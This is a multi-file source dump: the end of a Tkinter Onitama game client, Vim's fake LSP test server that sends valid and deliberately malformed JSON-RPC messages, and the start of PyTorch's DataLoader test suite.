        sentLength = self._serverSocket.send(GamestartRequestM.ToString().encode())
        if msgLength != sentLength:
            print("Sent only {0} chars of message {1}. Aborting...".
                  format(sentLength, GamestartRequestM.ToString()))
        else:
            print("Sent start session message '{0}'.".format(GamestartRequestM.ToString()))

    def GetQuitStatus(self):
        """Return the status code explaining why Display() returned."""
        return self._quitStatus

    def Display(self):
        """Build and run the session window (blocks in the Tk mainloop).

        After the window closes, GetQuitStatus() tells the caller why.
        """
        self._isClosing = False
        self._quitStatus = 200
        self._tkOnitamaClientWindow = Tk()
        self._tkOnitamaClientWindow.minsize(400, 150)
        self._tkOnitamaClientWindow.title('Onitama Client')
        self._tkOnitamaClientWindow.geometry('400x150')
        welcomeMessage = self._username + ", you are in session " + self._sessionname + "."
        self._infoMessage = StringVar(self._tkOnitamaClientWindow)
        self._infoMessage.set("")
        # Labels for displaying the data
        labelWelcome = Label(master=self._tkOnitamaClientWindow,
                             text=welcomeMessage,
                             fg='white', bg='gray',
                             font=('Arial', 10))
        labelWelcome.place(x=5, y=5, width=390, height=20)
        labelInfo = Label(master=self._tkOnitamaClientWindow,
                          textvariable=self._infoMessage,
                          fg='white', bg='gray',
                          font=('Arial', 10))
        labelInfo.place(x=5, y=30, width=390, height=20)
        labelOpponentName = Label(master=self._tkOnitamaClientWindow,
                                  text='Opponent:',
                                  fg='white', bg='gray',
                                  font=('Arial', 10))
        labelOpponentName.place(x=5, y=55, width=120, height=20)
        self._entryOpponentName = Label(master=self._tkOnitamaClientWindow,
                                        text="",
                                        fg='white', bg='gray',
                                        font=('Arial', 10))
        self._entryOpponentName.place(x=130, y=55, width=265, height=20)
        buttonLeave = Button(master=self._tkOnitamaClientWindow,
                             text="Leave Session",
                             command=self._leaveSession)
        buttonLeave.place(x=5, y=80, width=120, height=20)
        self._buttonStart = Button(master=self._tkOnitamaClientWindow,
                                   text="Start Session",
                                   command=self._startSession)
        self._buttonStart.place(x=275, y=80, width=120, height=20)
        # BUG FIX: the button is managed by place(), so it must be hidden
        # with place_forget() -- pack_forget() on a place()-managed widget
        # is a no-op and left the start button visible for guests.  The
        # reader thread already uses place_forget() for the same purpose.
        self._buttonStart.place_forget()
        self._sessionInfoThread = threading.Thread(target=self._processingIncomingMessages)
        self._sessionInfoThread.start()
        self._tkOnitamaClientWindow.mainloop()
        if (200 == self._quitStatus):
            self._serverSocket.close()
        self._isClosing = True
|
test_channel_lsp.py | #!/usr/bin/env python
#
# Server that will accept connections from a Vim channel.
# Used by test_channel.vim to test LSP functionality.
#
# This requires Python 2.6 or later.
from __future__ import print_function
import json
import socket
import sys
import time
import threading
try:
# Python 3
import socketserver
except ImportError:
# Python 2
import SocketServer as socketserver
class ThreadedTCPRequestHandler(socketserver.BaseRequestHandler):
    """Fake LSP server used by Vim's test_channel.vim.

    Each incoming JSON-RPC request selects, via its 'method' field, one of
    the do_* handlers below, which answer with a well-formed or (for the
    error-path tests) deliberately malformed Content-Length framed
    JSON-RPC message.
    """
    def setup(self):
        # Disable Nagle's algorithm so small test messages are sent at once.
        self.request.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
    def debuglog(self, msg):
        # Append to the debug log file, but only when debugging is enabled.
        if self.debug:
            with open("Xlspserver.log", "a") as myfile:
                myfile.write(msg)
    def send_lsp_msg(self, msgid, resp_dict):
        # Send a correctly framed LSP message.  msgid == -1 means a
        # notification: no 'id' field is included.
        v = {'jsonrpc': '2.0', 'result': resp_dict}
        if msgid != -1:
            v['id'] = msgid
        s = json.dumps(v)
        resp = "Content-Length: " + str(len(s)) + "\r\n"
        resp += "Content-Type: application/vim-jsonrpc; charset=utf-8\r\n"
        resp += "\r\n"
        resp += s
        if self.debug:
            self.debuglog("SEND: ({0} bytes) '{1}'\n".format(len(resp), resp))
        self.request.sendall(resp.encode('utf-8'))
    def send_wrong_payload(self):
        # Send a payload that is valid JSON but not a JSON-RPC dict.
        v = 'wrong-payload'
        s = json.dumps(v)
        resp = "Content-Length: " + str(len(s)) + "\r\n"
        resp += "Content-Type: application/vim-jsonrpc; charset=utf-8\r\n"
        resp += "\r\n"
        resp += s
        self.request.sendall(resp.encode('utf-8'))
    def send_empty_header(self, msgid, resp_dict):
        # Send a response without any header fields at all.
        v = {'jsonrpc': '2.0', 'id': msgid, 'result': resp_dict}
        s = json.dumps(v)
        resp = "\r\n"
        resp += s
        self.request.sendall(resp.encode('utf-8'))
    def send_empty_payload(self):
        # Send a header announcing a zero-length body.
        resp = "Content-Length: 0\r\n"
        resp += "Content-Type: application/vim-jsonrpc; charset=utf-8\r\n"
        resp += "\r\n"
        self.request.sendall(resp.encode('utf-8'))
    def send_extra_hdr_fields(self, msgid, resp_dict):
        # test for sending extra fields in the http header
        v = {'jsonrpc': '2.0', 'id': msgid, 'result': resp_dict}
        s = json.dumps(v)
        resp = "Host: abc.vim.org\r\n"
        resp += "User-Agent: Python\r\n"
        resp += "Accept-Language: en-US,en\r\n"
        resp += "Content-Type: application/vim-jsonrpc; charset=utf-8\r\n"
        resp += "Content-Length: " + str(len(s)) + "\r\n"
        resp += "\r\n"
        resp += s
        self.request.sendall(resp.encode('utf-8'))
    def send_delayed_payload(self, msgid, resp_dict):
        # test for sending the hdr first and then after some delay, send the
        # payload
        v = {'jsonrpc': '2.0', 'id': msgid, 'result': resp_dict}
        s = json.dumps(v)
        resp = "Content-Length: " + str(len(s)) + "\r\n"
        resp += "\r\n"
        self.request.sendall(resp.encode('utf-8'))
        time.sleep(0.05)
        resp = s
        self.request.sendall(resp.encode('utf-8'))
    def send_hdr_without_len(self, msgid, resp_dict):
        # test for sending the http header without length
        v = {'jsonrpc': '2.0', 'id': msgid, 'result': resp_dict}
        s = json.dumps(v)
        resp = "Content-Type: application/vim-jsonrpc; charset=utf-8\r\n"
        resp += "\r\n"
        resp += s
        self.request.sendall(resp.encode('utf-8'))
    def send_hdr_with_wrong_len(self, msgid, resp_dict):
        # test for sending the http header with wrong length
        v = {'jsonrpc': '2.0', 'id': msgid, 'result': resp_dict}
        s = json.dumps(v)
        resp = "Content-Length: 1000\r\n"
        resp += "\r\n"
        resp += s
        self.request.sendall(resp.encode('utf-8'))
    def send_hdr_with_negative_len(self, msgid, resp_dict):
        # test for sending the http header with negative length
        v = {'jsonrpc': '2.0', 'id': msgid, 'result': resp_dict}
        s = json.dumps(v)
        resp = "Content-Length: -1\r\n"
        resp += "\r\n"
        resp += s
        self.request.sendall(resp.encode('utf-8'))
    def do_ping(self, payload):
        # Reply to a ping request after a short delay.
        time.sleep(0.2)
        self.send_lsp_msg(payload['id'], 'alive')
    def do_echo(self, payload):
        # Echo the received payload back as a notification.
        self.send_lsp_msg(-1, payload)
    def do_simple_rpc(self, payload):
        # test for a simple RPC request
        self.send_lsp_msg(payload['id'], 'simple-rpc')
    def do_rpc_with_notif(self, payload):
        # test for sending a notification before replying to a request message
        self.send_lsp_msg(-1, 'rpc-with-notif-notif')
        # sleep for some time to make sure the notification is delivered
        time.sleep(0.2)
        self.send_lsp_msg(payload['id'], 'rpc-with-notif-resp')
    def do_wrong_payload(self, payload):
        # test for sending a non dict payload
        self.send_wrong_payload()
        time.sleep(0.2)
        self.send_lsp_msg(-1, 'wrong-payload')
    def do_large_payload(self, payload):
        # test for sending a large (> 64K) payload
        self.send_lsp_msg(payload['id'], payload)
    def do_rpc_resp_incorrect_id(self, payload):
        # Send responses with wrong/missing ids before the correct one.
        self.send_lsp_msg(-1, 'rpc-resp-incorrect-id-1')
        self.send_lsp_msg(-1, 'rpc-resp-incorrect-id-2')
        self.send_lsp_msg(1, 'rpc-resp-incorrect-id-3')
        time.sleep(0.2)
        self.send_lsp_msg(payload['id'], 'rpc-resp-incorrect-id-4')
    def do_simple_notif(self, payload):
        # notification message test
        self.send_lsp_msg(-1, 'simple-notif')
    def do_multi_notif(self, payload):
        # send multiple notifications
        self.send_lsp_msg(-1, 'multi-notif1')
        self.send_lsp_msg(-1, 'multi-notif2')
    def do_msg_with_id(self, payload):
        # Reply to a request using its own id.
        self.send_lsp_msg(payload['id'], 'msg-with-id')
    def do_msg_specific_cb(self, payload):
        # Reply used by the message-specific-callback test.
        self.send_lsp_msg(payload['id'], 'msg-specifc-cb')
    def do_server_req(self, payload):
        # Send a server-initiated request to the client.
        self.send_lsp_msg(201, {'method': 'checkhealth', 'params': {'a': 20}})
    def do_extra_hdr_fields(self, payload):
        self.send_extra_hdr_fields(payload['id'], 'extra-hdr-fields')
    def do_delayed_payload(self, payload):
        # NOTE: method renamed from the misspelled 'do_delayad_payload';
        # only referenced through the dispatch table below.
        self.send_delayed_payload(payload['id'], 'delayed-payload')
    def do_hdr_without_len(self, payload):
        self.send_hdr_without_len(payload['id'], 'hdr-without-len')
    def do_hdr_with_wrong_len(self, payload):
        self.send_hdr_with_wrong_len(payload['id'], 'hdr-with-wrong-len')
    def do_hdr_with_negative_len(self, payload):
        self.send_hdr_with_negative_len(payload['id'], 'hdr-with-negative-len')
    def do_empty_header(self, payload):
        self.send_empty_header(payload['id'], 'empty-header')
    def do_empty_payload(self, payload):
        self.send_empty_payload()
    def process_msg(self, msg):
        # Decode one JSON-RPC message and dispatch on its 'method' field.
        try:
            decoded = json.loads(msg)
            if 'method' in decoded:
                test_map = {
                    'ping': self.do_ping,
                    'echo': self.do_echo,
                    'simple-rpc': self.do_simple_rpc,
                    'rpc-with-notif': self.do_rpc_with_notif,
                    'wrong-payload': self.do_wrong_payload,
                    'large-payload': self.do_large_payload,
                    'rpc-resp-incorrect-id': self.do_rpc_resp_incorrect_id,
                    'simple-notif': self.do_simple_notif,
                    'multi-notif': self.do_multi_notif,
                    'msg-with-id': self.do_msg_with_id,
                    'msg-specifc-cb': self.do_msg_specific_cb,
                    'server-req': self.do_server_req,
                    'extra-hdr-fields': self.do_extra_hdr_fields,
                    'delayed-payload': self.do_delayed_payload,
                    'hdr-without-len': self.do_hdr_without_len,
                    'hdr-with-wrong-len': self.do_hdr_with_wrong_len,
                    'hdr-with-negative-len': self.do_hdr_with_negative_len,
                    'empty-header': self.do_empty_header,
                    'empty-payload': self.do_empty_payload
                }
                if decoded['method'] in test_map:
                    test_map[decoded['method']](decoded)
                else:
                    self.debuglog("Error: Unsupported method - " + decoded['method'] + "\n")
            else:
                self.debuglog("Error: 'method' field is not found\n")
        except ValueError:
            self.debuglog("Error: json decoding failed\n")
    def process_msgs(self, msgbuf):
        """Process every complete framed message in msgbuf; return the
        leftover (partial) text for the caller to keep."""
        while True:
            sidx = msgbuf.find('Content-Length: ')
            if sidx == -1:
                # partial message received
                return msgbuf
            sidx += 16
            # BUG FIX: search for the line terminator *after* the length
            # value.  Searching from the start of the buffer could find an
            # earlier header line (e.g. a "Host:" field), making
            # eidx < sidx and crashing int() on an empty slice.
            eidx = msgbuf.find('\r\n', sidx)
            if eidx == -1:
                # partial message received
                return msgbuf
            msglen = int(msgbuf[sidx:eidx])
            hdrend = msgbuf.find('\r\n\r\n')
            if hdrend == -1:
                # partial message received
                return msgbuf
            if msglen > len(msgbuf[hdrend + 4:]):
                if self.debug:
                    self.debuglog("Partial message ({0} bytes)\n".format(len(msgbuf)))
                # partial message received
                return msgbuf
            if self.debug:
                self.debuglog("Complete message ({0} bytes) received\n".format(msglen))
            # Remove the header
            msgbuf = msgbuf[hdrend + 4:]
            payload = msgbuf[:msglen]
            self.process_msg(payload)
            # Remove the processed message
            msgbuf = msgbuf[msglen:]
    def handle(self):
        # Per-connection loop: accumulate received text and hand it to
        # process_msgs() until the peer closes or errors out.
        self.debug = False
        self.debuglog("=== socket opened ===\n")
        msgbuf = ''
        while True:
            try:
                received = self.request.recv(4096).decode('utf-8')
            except socket.error:
                self.debuglog("=== socket error ===\n")
                break
            except IOError:
                self.debuglog("=== socket closed ===\n")
                break
            if received == '':
                self.debuglog("=== socket closed ===\n")
                break
            # Write the received lines into the file for debugging
            if self.debug:
                self.debuglog("RECV: ({0} bytes) '{1}'\n".format(len(received), received))
            # Can receive more than one line in a response or a partial line.
            # Accumulate all the received characters and process one line at
            # a time.
            msgbuf += received
            msgbuf = self.process_msgs(msgbuf)
class ThreadedTCPServer(socketserver.ThreadingMixIn, socketserver.TCPServer):
    """TCP server that handles each client connection on its own thread."""
def writePortInFile(port):
    """Write the server's port number into "Xportnr" so the Vim test
    script can find out which port to connect to."""
    # Use a context manager so the file is closed even if the write fails.
    with open("Xportnr", "w") as f:
        f.write("{0}".format(port))
def main(host, port, server_class=ThreadedTCPServer):
    """Start the threaded LSP test server and block until interrupted.

    Passing port 0 lets the OS choose an ephemeral port; the chosen port
    is published through writePortInFile().
    """
    # With the 'delay' argument, wait half a second before opening the
    # port, to exercise the waittime option of ch_open().  The port must
    # be published first, so a fixed port is used instead of letting the
    # OS pick one.
    if sys.argv[1:2] == ['delay']:
        port = 13684
        writePortInFile(port)
        time.sleep(0.5)
    server = server_class((host, port), ThreadedTCPRequestHandler)
    bound_host, port = server.server_address[0:2]
    # The server runs on its own thread and spawns one more thread per
    # accepted connection.
    acceptor = threading.Thread(target=server.serve_forever)
    acceptor.start()
    writePortInFile(port)
    # The main thread idles here; the server keeps going until
    # server.shutdown() is called.
    try:
        while acceptor.is_alive():
            acceptor.join(1)
    except (KeyboardInterrupt, SystemExit):
        server.shutdown()
# Entry point: serve on localhost with port 0 (the OS picks a free port).
if __name__ == "__main__":
    main("localhost", 0)
|
test_dataloader.py | # Owner(s): ["module: dataloader"]
import math
import sys
import errno
import multiprocessing
import os
import ctypes
import faulthandler
import torch
import gc
import time
import signal
import unittest
import itertools
import warnings
import tempfile
from torch import multiprocessing as mp
from torch.utils.data import (
ChainDataset,
ConcatDataset,
DataLoader,
DataLoader2,
Dataset,
IterableDataset,
Subset,
TensorDataset,
communication,
_utils
)
from torch.utils.data._utils import MP_STATUS_CHECK_INTERVAL
from torch.utils.data.dataset import random_split
from torch.utils.data.datapipes.iter import IterableWrapper
from torch.utils.data.datapipes.map import SequenceWrapper
from torch._utils import ExceptionWrapper
from torch.testing._internal.common_utils import (TestCase, run_tests, TEST_NUMPY, IS_WINDOWS,
IS_IN_CI, NO_MULTIPROCESSING_SPAWN, skipIfRocm, slowTest,
load_tests, TEST_WITH_ASAN, TEST_WITH_TSAN, IS_SANDCASTLE)
try:
import psutil
HAS_PSUTIL = True
except ImportError:
HAS_PSUTIL = False
err_msg = ("psutil not found. Some critical data loader tests relying on it "
"(e.g., TestDataLoader.test_proper_exit) will not run.")
if IS_IN_CI:
raise ImportError(err_msg) from None
else:
warnings.warn(err_msg)
try:
import dill
# XXX: By default, dill writes the Pickler dispatch table to inject its
# own logic there. This globally affects the behavior of the standard library
# pickler for any user who transitively depends on this module!
# Undo this extension to avoid altering the behavior of the pickler globally.
dill.extend(use_dill=False)
HAS_DILL = True
except ImportError:
HAS_DILL = False
skipIfNoDill = unittest.skipIf(not HAS_DILL, "no dill")
# load_tests from torch.testing._internal.common_utils is used to automatically filter tests for
# sharding on sandcastle. This line silences flake warnings
load_tests = load_tests
# We cannot import TEST_CUDA from torch.testing._internal.common_cuda here, because if we do that,
# the TEST_CUDNN line from torch.testing._internal.common_cuda will be executed multiple times
# as well during the execution of this test suite, and it will cause
# CUDA OOM error on Windows.
TEST_CUDA = torch.cuda.is_available()
if TEST_CUDA:
dev_name = torch.cuda.get_device_name(torch.cuda.current_device()).lower()
IS_JETSON = 'xavier' in dev_name or 'nano' in dev_name or 'jetson' in dev_name or 'tegra' in dev_name
else:
IS_JETSON = False
if not NO_MULTIPROCESSING_SPAWN:
# We want to use `spawn` if able because some of our tests check that the
# data loader terminiates gracefully. To prevent hanging in the testing
# process, such data loaders are run in a separate subprocess.
#
# We also want to test the `pin_memory=True` configuration, thus `spawn` is
# required to launch such processes and they initialize the CUDA context.
#
# Mixing different start method is a recipe for disaster (e.g., using a fork
# `mp.Event` with a spawn `mp.Process` segfaults). So we set this globally
# to avoid bugs.
#
# Get a multiprocessing context because some test / third party library will
# set start_method when imported, and setting again triggers `RuntimeError`.
mp = mp.get_context(method='spawn')
# 60s of timeout?
# Yes, in environments where physical CPU resources are shared, e.g., CI, the
# time for a inter-process communication can be highly varying. With 15~17s of
# timeout, we have observed flakiness in some CI builds (see
# pytorch/pytorch#14501, pytorch/pytorch#16608). We follow the CPython
# multiprocessing setup and set the timeout to 60s here:
#
# https://github.com/python/cpython/blob/e8113f51a8bdf33188ee30a1c038a298329e7bfa/Lib/test/_test_multiprocessing.py#L73
JOIN_TIMEOUT = 60.0 # seconds
supported_multiprocessing_contexts = [None] + list(torch.multiprocessing.get_all_start_methods())
@unittest.skipIf(
    TEST_WITH_TSAN,
    "Fails with TSAN with the following error: starting new threads after multi-threaded "
    "fork is not supported. Dying (set die_after_fork=0 to override)")
class TestDatasetRandomSplit(TestCase):
    """Tests for torch.utils.data.dataset.random_split and Subset slicing."""
    def test_lengths_must_equal_dataset_size(self):
        """random_split rejects lengths that do not sum to len(dataset)."""
        with self.assertRaises(ValueError):
            random_split([1, 2, 3, 4], [1, 2])
    def test_splits_have_correct_size(self):
        """Each returned split has exactly the requested length."""
        splits = random_split([1, 2, 3, 4, 5, 6], [2, 4])
        self.assertEqual(len(splits), 2)
        self.assertEqual(len(splits[0]), 2)
        self.assertEqual(len(splits[1]), 4)
    def test_splits_are_mutually_exclusive(self):
        """Together the splits contain every element exactly once."""
        data = [5, 2, 3, 4, 1, 6]
        splits = random_split(data, [2, 4])
        all_values = []
        all_values.extend(list(splits[0]))
        all_values.extend(list(splits[1]))
        data.sort()
        all_values.sort()
        self.assertListEqual(data, all_values)
    def test_splits_indexing_type(self):
        r"""Indices generated by random_split
            should be of integer type
        """
        class CustomDataset():
            # Minimal map-style dataset that asserts each index is an int.
            def __init__(self, test_object, custom_list):
                self.data = custom_list
                self.test_object = test_object
            def __getitem__(self, key):
                self.test_object.assertEqual(type(key), type(0))
                return self.data[key]
            def __len__(self):
                return len(self.data)
        x = [1, 2, 3, 4, 5]
        dataset = CustomDataset(self, x)
        dataset = random_split(dataset, [5])[0]
        data_loader = DataLoader(dataset)
        for batch in data_loader:
            pass
    def test_splits_reproducibility(self):
        """A fixed generator seed always produces the same split."""
        self.assertEqual(
            [list(x) for x in random_split(range(10), [3, 7], generator=torch.Generator().manual_seed(1))],
            [[5, 6, 1], [2, 0, 8, 9, 3, 7, 4]],
        )
        self.assertEqual(
            random_split(range(100), [60, 40], generator=torch.Generator().manual_seed(42)),
            random_split(range(100), [60, 40], generator=torch.Generator().manual_seed(42)),
        )
    def test_splits_generator(self):
        """random_split consumes the default RNG only when no generator is given."""
        # A random_split without a specific generator should affect the default one
        state = torch.get_rng_state()
        a = torch.rand(10)
        torch.set_rng_state(state)
        random_split(range(10), [5, 5])
        b = torch.rand(10)
        self.assertNotEqual(a, b)
        # A random_split with a specific generator should not affect the default one
        state = torch.get_rng_state()
        a = torch.rand(10)
        torch.set_rng_state(state)
        random_split(range(10), [5, 5], generator=torch.Generator().manual_seed(42))
        b = torch.rand(10)
        self.assertEqual(a, b)
    def test_slicing_of_subset_of_dataset(self):
        """Slicing a Subset gives the same items as slicing its indices."""
        # Testing slicing a subset initialized with a dataset
        dataset = TensorDataset(torch.tensor([1, 2, 3, 4, 5]))
        subset_of_dataset = Subset(dataset, [0, 1, 2, 3, 4])
        self.assertEqual(subset_of_dataset[:], dataset[:])
        self.assertEqual(subset_of_dataset[1:2], dataset[1:2])
        self.assertEqual(subset_of_dataset[0:-1:2], dataset[0:-1:2])
        # Testing slicing of subset from random split
        subset1, subset2 = random_split(dataset, [3, 2])
        self.assertEqual(subset1[:], dataset[subset1.indices[:]])
        self.assertEqual(subset1[0:2], dataset[subset1.indices[0:2]])
        self.assertEqual(subset1[0:-1:2], dataset[subset1.indices[0:-1:2]])
    def test_slicing_of_subset_of_subset(self):
        """Slicing composes correctly through nested Subsets."""
        # Testing slicing a subset initialized with a subset
        dataset = TensorDataset(torch.tensor([1, 2, 3, 4, 5]))
        subset_of_dataset = Subset(dataset, [0, 1, 2, 3, 4])
        subset_of_subset = Subset(subset_of_dataset, [0, 1, 2, 3, 4])
        self.assertEqual(subset_of_subset[:], dataset[:])
        self.assertEqual(subset_of_subset[0:2], dataset[0:2])
        self.assertEqual(subset_of_subset[0:-1:2], dataset[0:-1:2])
        # Testing slicing of subset of subset from random split
        subset1, subset2 = random_split(dataset, [4, 1])
        subset_of_subset1, subset_of_subset2 = random_split(subset1, [3, 1])
        idx = [subset1.indices[i] for i in subset_of_subset1.indices]
        self.assertEqual(subset_of_subset1[:], dataset[idx[:]])
        self.assertEqual(subset_of_subset1[0:2], dataset[idx[0:2]])
        self.assertEqual(subset_of_subset1[0:-1:2], dataset[idx[0:-1:2]])
class CUDACountingDataset(Dataset):
    """Map-style dataset of `n` items; item i is a CUDA scalar tensor i."""

    def __init__(self, n):
        super().__init__()
        self.n = n

    def __getitem__(self, index):
        return torch.as_tensor(index, device='cuda')

    def __len__(self):
        return self.n
class CountingDataset(Dataset):
    """Map-style dataset of `n` items that simply returns each index."""

    def __init__(self, n):
        super().__init__()
        self.n = n

    def __getitem__(self, index):
        return index

    def __len__(self):
        return self.n
class CountingIterableDataset(IterableDataset):
    """Iterable-style dataset yielding 0..n-1, with a known length."""

    def __init__(self, n):
        super().__init__()
        self.n = n

    def __iter__(self):
        return iter(range(self.n))

    def __len__(self):
        return self.n
@unittest.skipIf(
    TEST_WITH_TSAN,
    "Fails with TSAN with the following error: starting new threads after multi-threaded "
    "fork is not supported. Dying (set die_after_fork=0 to override)")
class TestTensorDataset(TestCase):
    """Tests for TensorDataset: length, indexing, and multi-tensor zip."""
    def test_len(self):
        """len() equals the tensors' shared first dimension."""
        source = TensorDataset(torch.randn(15, 10, 2, 3, 4, 5), torch.randperm(15))
        self.assertEqual(len(source), 15)
    def test_getitem(self):
        """Item i is the tuple of row i from every tensor."""
        t = torch.randn(15, 10, 2, 3, 4, 5)
        l = torch.randn(15, 10)
        source = TensorDataset(t, l)
        for i in range(15):
            self.assertEqual(t[i], source[i][0])
            self.assertEqual(l[i], source[i][1])
    def test_getitem_1d(self):
        """Indexing also works with 1-D tensors (scalar rows)."""
        t = torch.randn(15)
        l = torch.randn(15)
        source = TensorDataset(t, l)
        for i in range(15):
            self.assertEqual(t[i], source[i][0])
            self.assertEqual(l[i], source[i][1])
    def test_single_tensor(self):
        """A single tensor still yields 1-tuples."""
        t = torch.randn(5, 10)
        source = TensorDataset(t)
        self.assertEqual(len(source), 5)
        for i in range(5):
            self.assertEqual(t[i], source[i][0])
    def test_many_tensors(self):
        """Arbitrarily many tensors are zipped per index."""
        t0 = torch.randn(5, 10, 2, 3, 4, 5)
        t1 = torch.randn(5, 10)
        t2 = torch.randn(5, 10, 2, 5)
        t3 = torch.randn(5, 10, 3, 7)
        source = TensorDataset(t0, t1, t2, t3)
        self.assertEqual(len(source), 5)
        for i in range(5):
            self.assertEqual(t0[i], source[i][0])
            self.assertEqual(t1[i], source[i][1])
            self.assertEqual(t2[i], source[i][2])
            self.assertEqual(t3[i], source[i][3])
@unittest.skipIf(
    TEST_WITH_TSAN,
    "Fails with TSAN with the following error: starting new threads after multi-threaded "
    "fork is not supported. Dying (set die_after_fork=0 to override)")
class TestConcatDataset(TestCase):
    """Tests for ConcatDataset: concatenation, indexing, and its limits."""
    def test_concat_two_singletons(self):
        """Two single-item datasets concatenate to length 2."""
        result = ConcatDataset([[0], [1]])
        self.assertEqual(2, len(result))
        self.assertEqual(0, result[0])
        self.assertEqual(1, result[1])
    def test_concat_two_non_singletons(self):
        """Indices continue across the dataset boundary."""
        result = ConcatDataset([[0, 1, 2, 3, 4],
                                [5, 6, 7, 8, 9]])
        self.assertEqual(10, len(result))
        self.assertEqual(0, result[0])
        self.assertEqual(5, result[5])
    def test_concat_two_non_singletons_with_empty(self):
        # Adding an empty dataset somewhere is correctly handled
        result = ConcatDataset([[0, 1, 2, 3, 4],
                                [],
                                [5, 6, 7, 8, 9]])
        self.assertEqual(10, len(result))
        self.assertEqual(0, result[0])
        self.assertEqual(5, result[5])
    def test_concat_raises_index_error(self):
        """Out-of-range access raises IndexError."""
        result = ConcatDataset([[0, 1, 2, 3, 4],
                                [5, 6, 7, 8, 9]])
        with self.assertRaises(IndexError):
            # this one goes to 11
            result[11]
    def test_add_dataset(self):
        """dataset + dataset builds a ConcatDataset via __add__."""
        d1 = TensorDataset(torch.rand(7, 3, 28, 28), torch.rand(7))
        d2 = TensorDataset(torch.rand(7, 3, 28, 28), torch.rand(7))
        d3 = TensorDataset(torch.rand(7, 3, 28, 28), torch.rand(7))
        result = d1 + d2 + d3
        self.assertEqual(21, len(result))
        self.assertEqual(0, (d1[0][0] - result[0][0]).abs().sum())
        self.assertEqual(0, (d2[0][0] - result[7][0]).abs().sum())
        self.assertEqual(0, (d3[0][0] - result[14][0]).abs().sum())
    def test_iterable_dataset_err(self):
        """ConcatDataset refuses IterableDataset members anywhere in the list."""
        d1 = TensorDataset(torch.rand(7, 3, 28, 28), torch.rand(7))
        it1 = CountingIterableDataset(5)
        it2 = CountingIterableDataset(10)
        with self.assertRaisesRegex(AssertionError, "does not support IterableDataset"):
            ConcatDataset([d1, it2, it1])
        with self.assertRaisesRegex(AssertionError, "does not support IterableDataset"):
            ConcatDataset([it2])
        with self.assertRaisesRegex(AssertionError, "does not support IterableDataset"):
            ConcatDataset([it1, d1])
# takes in dummy var so this can also be used as a `worker_init_fn`
def set_faulthander_if_available(_=None):
    """Enable faulthandler tracebacks on stderr; off Windows, also dump all
    thread stacks on SIGUSR1 without killing the process."""
    faulthandler.enable(sys.__stderr__)
    if IS_WINDOWS:
        # windows does not have faulthandler.register
        return
    # chain=False prevents the default behavior of killing the process
    faulthandler.register(signal.SIGUSR1, file=sys.__stderr__, chain=False)


set_faulthander_if_available()
# Process `pid` must have called `set_faulthander_if_available`
def print_traces_of_all_threads(pid):
    """Ask process `pid` (which must have run set_faulthander_if_available)
    to print the stack traces of all its threads."""
    if IS_WINDOWS:
        # No custom signal handler on Windows; fall back to the handler
        # installed by faulthandler.enable(), at the cost of killing the
        # process.
        os.kill(pid, signal.SIGSEGV)
    else:
        # use the custom signal if available
        os.kill(pid, signal.SIGUSR1)
    # wait in parent process to give subprocess some time to print
    time.sleep(5)
# The following `ErrorTrackingProcess` stores the first encountered exception in
# its `.exception` attribute.
# Inspired by https://stackoverflow.com/a/33599967
class ErrorTrackingProcess(mp.Process):
    """mp.Process that forwards the first exception raised in the child
    through a pipe, exposed to the parent via the `.exception` property."""
    # Why no *args?
    # py2 doesn't support def fn(x, *args, key=val, **kwargs)
    # Setting disable_stderr=True may generate a lot of unrelated error outputs
    # but could be helpful for debugging.
    def __init__(self, disable_stderr=True, **kwargs):
        super(ErrorTrackingProcess, self).__init__(**kwargs)
        # parent / child ends of the pipe carrying the child's exception
        self._pconn, self._cconn = mp.Pipe()
        self._exception = None
        self.disable_stderr = disable_stderr
    def run(self):
        """Child-side entry: run the target, report None on success or an
        ExceptionWrapper on failure, then re-raise."""
        set_faulthander_if_available()
        if self.disable_stderr:
            # Disable polluting stderr with errors that are supposed to happen.
            with open(os.devnull, 'w') as devnull:
                os.dup2(devnull.fileno(), sys.stderr.fileno())
        try:
            super(ErrorTrackingProcess, self).run()
            self._cconn.send(None)
        except Exception:
            self._cconn.send(ExceptionWrapper(sys.exc_info()))
            raise
    def print_traces_of_all_threads(self):
        """Dump the live child's thread stacks (requires stderr enabled)."""
        assert self.is_alive(), "can only use print_traces_of_all_threads if the process is alive"
        assert not self.disable_stderr, "do not disable stderr if you use print_traces_of_all_threads"
        # On platforms without `SIGUSR1`, `set_faulthander_if_available` sets
        # `faulthandler.enable()`, and `print_traces_of_all_threads` may kill
        # the process. So let's poll the exception first
        _ = self.exception
        print_traces_of_all_threads(self.pid)
    @property
    def exception(self):
        """Reconstructed child exception, or None if the child succeeded
        (or has not reported yet)."""
        if self._pconn.poll():
            self._exception = self._pconn.recv()
        if self._exception is None:
            return None
        else:
            return self._exception.exc_type(self._exception.exc_msg)
    # ESRCH from os.kill means no live process with that pid was found
    def send_signal(self, signum, ignore_ESRCH=False):
        try:
            os.kill(self.pid, signum)
        except OSError as e:
            if not ignore_ESRCH or e.errno != errno.ESRCH:
                raise
class ErrorDataset(Dataset):
    """Dataset stub that advertises a length but defines no __getitem__,
    so any item access fails."""

    def __init__(self, size):
        self.size = size

    def __len__(self):
        return self.size
class SegfaultDataset(Dataset):
    """Dataset whose item access crashes the process on purpose (used to
    test worker-crash handling)."""

    def __init__(self, size):
        self.size = size

    def __getitem__(self, index):
        # Reading from address 0 segfaults the interpreter deliberately.
        return ctypes.string_at(0)

    def __len__(self):
        return self.size
class SleepDataset(Dataset):
    """Dataset returning its index, but sleeping `sleep_sec` seconds on the
    very first item fetch only."""

    def __init__(self, size, sleep_sec):
        self.sleep_sec = sleep_sec
        self.size = size
        self.sleeped = False

    def __getitem__(self, index):
        # Only the first access pays the sleep penalty.
        if not self.sleeped:
            self.sleeped = True
            time.sleep(self.sleep_sec)
        return index

    def __len__(self):
        return self.size
class SeedDataset(Dataset):
    """Every item is the fetching process's torch RNG seed; used to verify
    worker seeding."""

    def __init__(self, size):
        self.size = size

    def __getitem__(self, index):
        return torch.initial_seed()

    def __len__(self):
        return self.size
class WorkerSpecificIterableDataset(IterableDataset):
    """Iterable dataset whose per-worker length is taken from
    `sizes_for_all_workers[worker_id]`; must be iterated inside a worker."""

    def __init__(self, sizes_for_all_workers):
        self.sizes_for_all_workers = sizes_for_all_workers

    def __iter__(self):
        info = torch.utils.data.get_worker_info()
        assert info is not None
        return iter(range(self.sizes_for_all_workers[info.id]))

    def __len__(self):
        # Total length across all workers.
        return sum(self.sizes_for_all_workers)
